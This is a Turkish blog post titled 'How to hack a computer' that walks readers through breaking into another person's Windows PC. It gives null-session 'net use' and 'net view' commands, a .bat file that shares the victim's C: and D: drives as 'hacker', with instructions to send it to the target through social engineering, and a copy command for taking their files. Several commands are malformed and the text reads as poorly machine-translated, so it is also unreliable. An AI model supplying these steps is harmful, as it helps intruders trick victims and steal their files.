e
sv

Bilgisayar Nasıl Hacklenir?

398 Okunma — 21 Şubat 2021 21:22
bilgisayar hackleme
avatar

admin

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Günümüzün teknoloji çağı günler geçtikçe yeniliklerini göstermeye devam ediyor.Bilgisayar yapan firmaların, kullandıkları işletim sistemlerini değişiklik gösterdiğini biliyoruz.Peki işletim sistemlerinde ki zaafiyetleri kullanarak bir bilgisayarı nasıl hackleriz?

Her yeni işletim sistemlerinde gelen güncellemeler eşliğinde değişik değişik zaafiyetlerde yanında gelmektedir.İşletim sistemi zaafiyetlerini kullanarak pc hackleme nasıl yapılır? Akılda artan soru işaretlerine yazımızın gelişen bölümlerinde bilgilerini size vereceğim.

Bilgisayar hacklemek için sizlere 3 yöntemden bahsedeceğim.Windows tarafında terminal ekranı diye tanımladığımız “CMD” ile doğan zaafiyetlerden faydalanarak bir bilgisayarı nasıl hackleyebiliriz?

Bilgisayar nasıl hacklenir
 • Bilgisayarın Null açığını kullanarak sızabiliriz.Fakat yapacaklarınız kısıtlanmıştır.
 • Karşı tarafın bilgisayarı dosya paylaşımına açılmış şayet bütün bilgilerini kendi bilgisayarımıza kopyalayabiliriz.
 • Bilgisayarı tamamıyla denetim altına alabilir, ve her buyruk ile hacklediğiniz bilgisayarı yönlendirebiliriz.

Eğer ki iki numarada ki prosedür üzerinden devam edersek hacklemek dilediğiniz pc için sizlere vereceğim adımları uygularsanız mutlak netice alabilirsiniz.Aşağıda sizlere vermiş olduğum kodu “CMD” ekranına kopyalayıp enter tuşuna basınız.

net use \192.168.1.1\ipc$\u:”” “”

Eğer ki buyruk dönütü etkin şayet karşı tarafın bilgisayarında ki bütün verileri kendi bilgisayarınıza kopyalayabilirsiniz demektir.Yukarıda ki kodun ip kısmına hacklemek dilediğiniz pc ip adresini yazınız.Komut etkin dönütünden ardından alçakta ki kodu yineleme cmd ekranına yapıştırın.

net view \192.168.1.1
Yukarıda ki kod şayet ilişki kurduktan ardından bütün bilgisayarın içinde ki dosyaları görüntüleme kodudur.

Tüm bu aşamaları tamamladıktan ardından alçakta ki vereceğim kod satırını, not defterini kopyalayın.Daha sonra değişik kaydet diye rastgele bir yere .bat olarak kayıt edin.Oluşturmuş olduğunuz bu dosyayı hacklemek dilediğiniz şahsa sosyal mühendislik yardımı ile gönderin.

net share hacker=c:\ /unlimited /remark:”RockStar”
net share hacker=d:\ /unlimited /remark:”RockStar”
Eğer ki oluşturmuş olduğunuz .bat dosyasını karşı doğrultu açmış şayet bilgisayarında ki bütün dosyaları bundan sonra kopyalayabilirsiniz.Dosyayı açmış olduğunu denetim etmek için alçakta vereceğim kodu yineleme cmd üstüne yapıştırın.

net view \[bağlandığınız ip]

Eğer ki buyruk etkin dönütü alır iseniz bundan sonra bütün bilgilerini kopyalayabilirsiniz.Tüm bilgilerini kopyalamak için kodu alçakta ki yeniden cmd üstüne yapıştırın ve enter basın.

copy \192.168.1.1\c\matrix.bat C:\ or /

Sizlere bu yazımızda pc nasıl hacklenir, pc hacklemek sorularını cevap bulmaya çalıştık.Diğer yazılarımızı inceleyemeyi unutmamalısınız.

Sıradaki içerik:

Bilgisayar Nasıl Hacklenir?